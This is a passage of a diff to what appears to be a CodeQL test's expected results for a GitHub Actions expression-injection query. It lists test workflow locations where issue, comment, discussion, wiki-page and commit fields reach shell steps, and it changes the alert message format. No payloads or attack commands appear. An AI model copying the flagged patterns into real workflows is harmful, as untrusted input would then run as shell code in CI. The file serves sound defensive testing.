github.event.workflow_run.head_commit.committer.name | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | +| action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/changed-files.yml:21:14:24:15 | \| | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:21:14:24:15 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/cross3.yml:41:12:43:5 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:41:12:43:5 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/matrix.yml:41:12:42:31 | \| | .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | .github/workflows/matrix.yml:41:12:42:31 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | -| action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | +| .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | 